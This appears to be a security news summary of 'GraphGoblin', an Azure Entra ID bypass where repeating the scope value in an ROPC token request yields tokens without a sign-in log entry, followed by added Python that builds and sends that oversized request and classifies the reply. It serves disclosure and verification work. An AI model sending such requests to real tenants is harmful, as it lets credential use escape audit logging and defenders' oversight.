Azure Entra ID Sign-In Log Bypass GraphGoblin: Tokens Issued Without Logging

A researcher found a fourth Azure Entra ID sign-in log bypass that permits full token issuance without any activity being recorded in the tenant's most critical admin log. GraphGoblin exploits a SQL column overflow: by repeating a valid scope value 35,000+ times in a single token request, an attacker can validate credentials and retrieve tokens without the sign-in ever appearing in the log. Microsoft fixed the bypass within two weeks of the video disclosure, faster than for the previous bypasses, yet initially declined to rate it Important even though the flaw returns full tokens while leaving no trace in that log.

Key Takeaways

  • CVE pending; affects the Azure Entra ID OAuth2 ROPC (resource owner password credentials) flow, allowing full token issuance with no sign-in log entry
  • Repeating the scope parameter (10,000+ "openid" values) overflows a SQL column length, so the sign-in log INSERT fails while authentication still succeeds; the sign-in is therefore never recorded
  • Microsoft MSRC declined the Important classification despite a CVSS 7.5-8.7 rating and direct impact on the most critical Azure log; the researcher disputes the severity downgrade
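The following Python is an added example written for this summary; it is not code from the TrustedSec post or from the researcher. It shows the shape of the request the bullets describe (an ROPC grant whose scope is repeated tens of thousands of times) and classifies the token endpoint's reply, so a tenant owner can confirm against a test account they control that the bypass no longer yields a token. Assumptions: the v2.0 token endpoint is targeted; the summary does not say whether the scope parameter was repeated as separate keys or as one space-separated value, so both encodings are offered; the sample responses are constructed and the probe is only sent if you call `probe_tenant` yourself.

```python
"""Oversized-scope ROPC request builder and response classifier (added example)."""
import json
import urllib.error
import urllib.parse
import urllib.request

# Assumption: the v2.0 endpoint; change to /oauth2/token if your tenant uses v1.0.
TOKEN_ENDPOINT = "https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token"


def build_ropc_body(client_id, username, password, repeats=35_000,
                    scope_value="openid", repeat_as_keys=True):
    """Return the urlencoded ROPC form body with scope_value repeated `repeats` times.

    repeat_as_keys=True  -> scope=openid&scope=openid&...   (parameter repeated)
    repeat_as_keys=False -> scope=openid+openid+...         (one value, many words)
    The summary does not state which encoding was used; both are assumptions.
    """
    fields = [("grant_type", "password"), ("client_id", client_id),
              ("username", username), ("password", password)]
    if repeat_as_keys:
        fields += [("scope", scope_value)] * repeats
    else:
        fields.append(("scope", " ".join([scope_value] * repeats)))
    return urllib.parse.urlencode(fields).encode()


def count_scope_values(body):
    """Count scope values in a form body, whichever encoding was used."""
    parsed = urllib.parse.parse_qs(body.decode(), keep_blank_values=True)
    return sum(len(value.split()) for value in parsed.get("scope", []))


def classify_token_response(status, body):
    """Map a token endpoint reply to 'token_issued', 'rejected:<error>' or 'unknown'."""
    try:
        data = json.loads(body)
    except ValueError:
        return "unknown"
    if status == 200 and "access_token" in data:
        return "token_issued"
    if "error" in data:
        return "rejected:" + str(data["error"])
    return "unknown"


# Constructed sample replies (not captured traffic) to exercise the classifier.
SAMPLE_RESPONSES = {
    "token": (200, b'{"token_type":"Bearer","access_token":"eyJ...","expires_in":3599}'),
    "denied": (400, b'{"error":"invalid_grant","error_description":"AADSTS..."}'),
    "gateway": (413, b"<html>Request Entity Too Large</html>"),
}


def classify_samples():
    """Classify every constructed sample; returns {name: classification}."""
    return {name: classify_token_response(s, b) for name, (s, b) in SAMPLE_RESPONSES.items()}


def probe_tenant(tenant, client_id, username, password, repeats=35_000):
    """Send the oversized-scope request to a TEST account you own and classify the reply.

    After the fix the expected result is a rejection (or a normally logged sign-in);
    'token_issued' would mean the tenant still hands out tokens for this request shape.
    Note the body is several hundred kB, so a front-end size limit may reject it
    before the grant is ever evaluated; that still counts as a rejection here.
    """
    req = urllib.request.Request(
        TOKEN_ENDPOINT.format(tenant=tenant),
        data=build_ropc_body(client_id, username, password, repeats),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST")
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return classify_token_response(resp.status, resp.read())
    except urllib.error.HTTPError as exc:
        return classify_token_response(exc.code, exc.read())


if __name__ == "__main__":
    body = build_ropc_body("client-id", "user@example.com", "password")
    print(f"{count_scope_values(body)} scope values, {len(body)} bytes")
    print(classify_samples())
```

Run it once without arguments to see the request size (about 455 kB for 35,000 repetitions); a token endpoint that returns `token_issued` for such a body, with no matching entry in the sign-in log, is exactly the condition the researcher reported.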

Original source: TrustedSec